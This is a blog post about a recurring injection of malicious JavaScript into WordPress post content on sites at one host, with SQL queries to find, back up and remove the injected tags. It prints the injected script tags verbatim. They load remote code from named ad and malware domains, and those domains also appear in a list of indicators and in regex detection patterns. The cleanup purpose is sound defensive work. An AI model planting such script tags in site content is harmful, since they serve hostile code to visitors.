Repeated SQL Injection: Malicious Javascript in post_content column [ fix ]

Last updated: October 15 2019

Recently I've been dealing with a repeated contamination: the post_content column ( wp_posts -> post_content ) keeps getting injected with malicious JavaScript code.
So far only two sites I manage are affected. Both are hosted by tsohost.com ( Paragon Internet Group Limited ).

After a Google search, I found more sites with the exact same issue – all hosted by tsoHost.

Malicious scripts found:

<script type='text/javascript' src='//pl15180773.pvclouds.com/2b/e2/3d/2be23d024eff3a5446e06744968768be.js'></script><script data-cfasync='false' type='text/javascript' src='//p79479.clksite.com/adServe/banners?tid=79479_127480_7&tagid=2'></script>
<script data-cfasync=\'false\' type=\'text/javascript\' src=\'//p79479.clksite.com/adServe/banners?tid=79479_127480_7&tagid=2\'></script><script type=\"text/javascript\" src=\"//dolohen.com/apu.php?zoneid=2574011\" async data-cfasync=\"false\"></script><script type=\"text/javascript\" src=\"//dolohen.com/apu.php?zoneid=676630\" async data-cfasync=\"false\"></script>

Several malicious URLs:

pl15180773.pvclouds.com/2b/e2/3d/2be23d024eff3a5446e06744968768be.js
p79479.clksite.com/adServe/banners?tid=79479_127480_7&tagid=2
dolohen.com/apu.php?zoneid=676630
dolohen.com/apu.php?zoneid=2574011
ellcurvth.com/afu.php?zoneid=
ellcurvth.com/afu.php?zoneid=2826294
humsoolt.net/pfe/current/tag.min.js?z=2774009

Approx. 117 infected web pages are currently indexed by publicwww.
Another 394 web pages are infected with "ellcurvth.com/afu.php?zoneid=2826294".

A quick temporary fix is to strip the <script> elements from the post_content column, using the following SQL queries:

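-- Run first: remove complete <script ...>...</script> elements, including multi-line bodies.
UPDATE wp_posts SET post_content = REGEXP_REPLACE(post_content, '<script(.*?)>((.|\n)*?)<\/script>', '');
-- Then: remove any leftover opening <script ...> tags that had no closing tag.
UPDATE wp_posts SET post_content = REGEXP_REPLACE(post_content, '<script(.*?)>', '');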

Notes:
– back up the database first.
– check the table prefix and update the SQL queries if needed.
– if the malware returns, switch hosting.

code written by @webartisan.
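
The queries above strip every script element from every post, including legitimate embeds. The following is an added example, not part of the original post or @webartisan's code: it audits first, keeps a copy of the affected rows, and removes only script elements whose tag references one of the hosts listed on this page. It assumes MariaDB 10.0.5+ or MySQL 8.0+ (for REGEXP_REPLACE), the default wp_ prefix, and a hypothetical backup table name wp_posts_script_backup.

```sql
-- Added example. [.] matches a literal dot without relying on backslash escaping.
-- The host list is taken from the URLs listed on this page.

-- 1. Audit: which rows (published posts, drafts and revisions) are affected?
SELECT ID, post_type, post_status, post_modified,
       CHAR_LENGTH(post_content) AS content_len
FROM wp_posts
WHERE post_content REGEXP
  '<script[^>]*(pvclouds[.]com|clksite[.]com|dolohen[.]com|ellcurvth[.]com|humsoolt[.]net)'
ORDER BY post_modified DESC;

-- 2. Keep an untouched copy of the affected rows for analysis or rollback.
--    wp_posts_script_backup is a hypothetical table name.
CREATE TABLE wp_posts_script_backup AS
SELECT * FROM wp_posts
WHERE post_content REGEXP
  '<script[^>]*(pvclouds[.]com|clksite[.]com|dolohen[.]com|ellcurvth[.]com|humsoolt[.]net)';

-- 3. Remove only the matching <script ...></script> elements.
--    [^>]* also covers the variant with backslash-escaped quotes (\' and \")
--    shown in the second sample; [^<]* allows an empty or plain-text body.
UPDATE wp_posts
SET post_content = REGEXP_REPLACE(
      post_content,
      '<script[^>]*(pvclouds[.]com|clksite[.]com|dolohen[.]com|ellcurvth[.]com|humsoolt[.]net)[^>]*>[^<]*</script>',
      '')
WHERE post_content REGEXP
  '<script[^>]*(pvclouds[.]com|clksite[.]com|dolohen[.]com|ellcurvth[.]com|humsoolt[.]net)';

-- 4. Verify: the count should be 0. A non-zero result means a tag variant
--    that step 3 did not match and that needs manual review.
SELECT COUNT(*) AS still_infected
FROM wp_posts
WHERE post_content REGEXP
  '<script[^>]*(pvclouds[.]com|clksite[.]com|dolohen[.]com|ellcurvth[.]com|humsoolt[.]net)';

-- 5. Anything left with a <script> tag is either legitimate or a new
--    indicator; review these by hand before extending the host list.
SELECT ID, post_type, post_status
FROM wp_posts
WHERE post_content REGEXP '<script';
```

Re-running step 1 on a schedule shows whether the injection returns after cleanup, which is the signal the notes above tie to switching hosting.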
